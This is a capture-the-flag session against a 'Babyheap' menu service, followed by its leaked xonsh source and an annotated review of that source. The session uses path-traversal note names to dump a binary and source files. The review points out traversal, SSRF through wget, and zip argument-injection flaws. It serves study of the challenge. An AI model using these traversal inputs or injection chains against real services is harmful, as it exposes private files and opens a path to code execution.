nc eof.h4ck3r.quest 7122
======== [Babyheap] ========
1. Malloc
2. Show
3. List
4. Free
0. Exit
----------------------------
> 2
Note name: ../../../../../../../../../readflag
1 ELF>?@?:@8
@@@@h???(( XX?-?=?=???-?=?=????DDP?td <<Q?tdR?td?-?=?=/lib64/ld-linux-x86-64.so.2GNU?4'h??0???NO?? ?r?GNU??e?mu 1M? ? !)7"setuidfopenperrorputsfclosesetegidseteuidfread__cxa_finalizesetgid__libc_start_mainlibc.so.6GLIBC_2.2.5_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTable_ui i???phh@????????
2 ??@ @(@0@8@@ H@
P@
?H?=???.?DH?=i/H?b/H9?tH??.H??t??????H?=9/H?52/H)?H??H???H??H?H??tH??.H????fD???=?.u/UH?=v.H??t?p????%?/?`????%2/f?1?I??^H??H???PTL?*H?
H?=?.?-????h?????.]?????{???UH??H?????????????????????????d???HDž????HDž????HDž???H???HDž???HDž???HDž ???HDž(???HDž0???HDž8???HDž@???HDžH???HDžP???HDžX???HDž`???HDžh???HDžp???HDžx???H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?E?H?5?
H?=?
?+???H?E?H?}?uH?=?
?$?????@H?U?H??????H?Ѻ?H??????H??????H??????H?E?H?????????f.??AWL?=/*AVI??AUI??ATA??UH?- *SL)?H??#???H??t?L??L??D??A??H??H9?u?H?[]A\A]A^A_??H?H??r/flagfopen8
?????????????T??????????????,zRx
`???+zRx
$?????FJ
? ??;*3$"D???\?????A?C
D|????]B?I?E ?E(?D0?H8?G@j8A0A(B BB??????p_
?????0
3 ?
@?P? ??????op???o???oR???o?=6FVfv????h@GCC: (Debian 10.2.1-6) 10.2.1 20210110??0?p ?
4 P
?? P ?=?=?=??@`@p@??
0!p7p@C?=j?v?=??????T!????=??=??=? ?@?
? `@0ASp@Zm?`@? ?h@? ??]?x@??+?p@????? p@( BU"p?crtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryreadflag.c__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTableputs@GLIBC_2.2.5fread@GLIBC_2.2.5_edatafclose@GLIBC_2.2.5__libc_start_main@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used__libc_csu_init__bss_startmainsetgid@GLIBC_2.2.5fopen@GLIBC_2.2.5perror@GLIBC_2.2.5__TMC_END___ITM_registerTMCloneTablesetuid@GLIBC_2.2.5__cxa_finalize@GLIBC_2.2.5setegid@GLIBC_2.2.5seteuid@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.plt.data.bss.comment?#??$6?? D??No
00V???^???oRRk???oppz???BPP?? ????A? ? ? <?P ??????=?-?????@?`@`p@p?0p0'?0?- X7??9
======== [Babyheap] ========
1. Malloc
2. Show
3. List
4. Free
0. Exit
----------------------------
> 2
Note name: ../../../../../../../../..//usr/local/bin/xonsh
1 #!/usr/local/bin/python
2 # -*- coding: utf-8 -*-
3 import re
4 import sys
5 from xonsh.main import main
6 if __name__ == '__main__':
7 sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
8 sys.exit(main())
======== [Babyheap] ========
1. Malloc
2. Show
3. List
4. Free
0. Exit
----------------------------
> 2
Note name: /home/babyheap/main.xonsh
1 #!env xonsh
2 import secrets
3 import atexit
4 from urllib.parse import urlparse
5 from os import path
6 sandbox = f"/tmp/sandbox/{secrets.token_hex(16)}"
7 atexit.register(lambda: $[rm -rf @(sandbox)])
8 rm -rf @(sandbox)
9 mkdir -p @(sandbox)
10 cd @(sandbox)
11 def menu():
12 print(
13 "======== [Babyheap] ========\n"
14 "1. Malloc\n"
15 "2. Show\n"
16 "3. List\n"
17 "4. Free\n"
18 "0. Exit\n"
19 "----------------------------\n"
20 )
21 while True:
22 menu()
23 option = input("> ")
24 if option == "1":
25 file = secrets.token_hex(8) + ".txt"
26 size = input("Size: ")
27 if not size.isdigit():
28 exit -1
29 size = int(size)
30 content = input("Content: ")[:size]
31 echo @(content) | cowsay > @(file)
32 echo f"Note {file} created"
33 elif option == "2":
34 file = input("Note name: ")
35 if path.exists(file):
36 nl @(file)
37 else:
38 echo f"Note '{file}' does not exist"
39
40 elif option == "3":
41 for file in gp`./*.txt`:
42 echo "[+]" @(file.name)
43
44 elif option == "4":
45 file = path.basename(input("Note name: "))
46 if path.exists(file):
47 rm -f @(file)
48 echo f"Deleted '{file}'"
49 else:
50 echo f"free(): double free detected in tcache 1"
51 elif option == "9487":
52 url = input("URL: ")
53 if urlparse(url).path.endswith(".txt"):
54 wget --no-clobber @(url)
55 else:
56 echo "Should be a .txt file"
57
58 elif option == "9527":
59 zip export.zip *
60 link = $(curl --upload-file export.zip https://transfer.sh/export.zip)
61 echo f"Exported to {link}"
62 rm -f export.zip
63 elif option == "0":
64 echo "Exiting..."
65 break
66
67 else:
68 echo "Invalid option"
69 print()
#!env xonsh
import secrets
import atexit
from urllib.parse import urlparse
from os import path
# Per-session working directory: /tmp/sandbox/<32 random hex characters>.
sandbox = f"/tmp/sandbox/{secrets.token_hex(16)}"
# Remove the directory again when the interpreter exits. $[...] runs the
# command as an uncaptured subprocess; @(sandbox) passes the Python value
# to it as an argument.
atexit.register(lambda: $[rm -rf @(sandbox)])
# Start from an empty directory, then make it the current working directory.
rm -rf @(sandbox)
mkdir -p @(sandbox)
# NOTE(review): `cd` only changes the working directory. Nothing in this
# script confines later file access to it, so every handler that accepts a
# user-supplied path has to perform its own containment check.
cd @(sandbox)
def menu():
    """Print the option banner.

    Only options 1-4 and 0 are advertised here; the dispatch loop in this
    file also accepts "9487" and "9527", which the banner does not list.
    """
    print(
        "======== [Babyheap] ========\n"
        "1. Malloc\n"
        "2. Show\n"
        "3. List\n"
        "4. Free\n"
        "0. Exit\n"
        "----------------------------\n"
    )
# Main request loop: print the menu, read one option, dispatch on it.
# Every input() value is supplied by the user of the service and must be
# treated as untrusted. Indentation below is reconstructed from the
# if/elif/else structure; the listing on the page had lost it.
while True:
    menu()
    option = input("> ")
    if option == "1":
        # "Malloc": create a note under a server-chosen random name.
        file = secrets.token_hex(8) + ".txt"
        size = input("Size: ")
        if not size.isdigit():
            # Non-numeric size is rejected.
            # NOTE(review): presumably this ends the session; confirm how
            # xonsh evaluates `exit -1` here.
            exit -1
        size = int(size)
        # Keep at most `size` characters of the supplied content.
        content = input("Content: ")[:size]
        # The content is passed to echo as an argument via @(...), piped
        # through cowsay and written to the note file.
        echo @(content) | cowsay > @(file)
        echo f"Note {file} created"
    elif option == "2":
        # "Show": print a note with line numbers.
        # NOTE(review): the name is used exactly as typed. Unlike option 4
        # there is no path.basename(), so "../" sequences and absolute paths
        # are accepted and `nl` will print any file the service account can
        # read. Mitigation: reduce the input to a basename (or resolve it and
        # verify the result is inside `sandbox`) and pass it after `--`.
        file = input("Note name: ")
        if path.exists(file):
            nl @(file)
        else:
            echo f"Note '{file}' does not exist"
    elif option == "3":
        # "List": gp`...` is xonsh's path-glob literal; print the name of each
        # .txt entry in the current directory.
        for file in gp`./*.txt`:
            echo "[+]" @(file.name)
    elif option == "4":
        # "Free": delete a note. path.basename() strips any directory part,
        # so the deletion stays within the current directory.
        # NOTE(review): the operand is still passed without a preceding `--`,
        # so a name starting with "-" would be parsed by rm as an option.
        file = path.basename(input("Note name: "))
        if path.exists(file):
            rm -f @(file)
            echo f"Deleted '{file}'"
        else:
            echo f"free(): double free detected in tcache 1"
    elif option == "9487":
        # Unadvertised option: download a user-supplied URL into the sandbox.
        # NOTE(review): the only validation is that the URL *path* ends in
        # ".txt". Scheme and host are unrestricted, so the server fetches
        # from wherever the user points it, and the value is handed to wget
        # with no `--` separator. By default wget also derives the local file
        # name from the URL, so the requester influences what names appear in
        # the sandbox. Mitigation: allowlist scheme and host, save to a
        # server-generated name (wget -O), and put `--` before the URL.
        url = input("URL: ")
        if urlparse(url).path.endswith(".txt"):
            wget --no-clobber @(url)
        else:
            echo "Should be a .txt file"
    elif option == "9527":
        # Unadvertised option: archive the sandbox and upload it to a
        # third-party host, then print the link returned by curl.
        # NOTE(review): the bare `*` is glob-expanded into zip's argument
        # list, so any entry whose name begins with "-" is parsed as a zip
        # option rather than a file. Combined with option 9487, file names
        # here are not fully server-controlled. Mitigation: use `./*` or an
        # explicit list of validated names after `--`. Also note that note
        # contents leave the host for an external service.
        zip export.zip *
        link = $(curl --upload-file export.zip https://transfer.sh/export.zip)
        echo f"Exported to {link}"
        rm -f export.zip
    elif option == "0":
        echo "Exiting..."
        break
    else:
        echo "Invalid option"
    # NOTE(review): placement inside the loop is assumed from context (a
    # blank line after each action); the page's listing does not show it.
    print()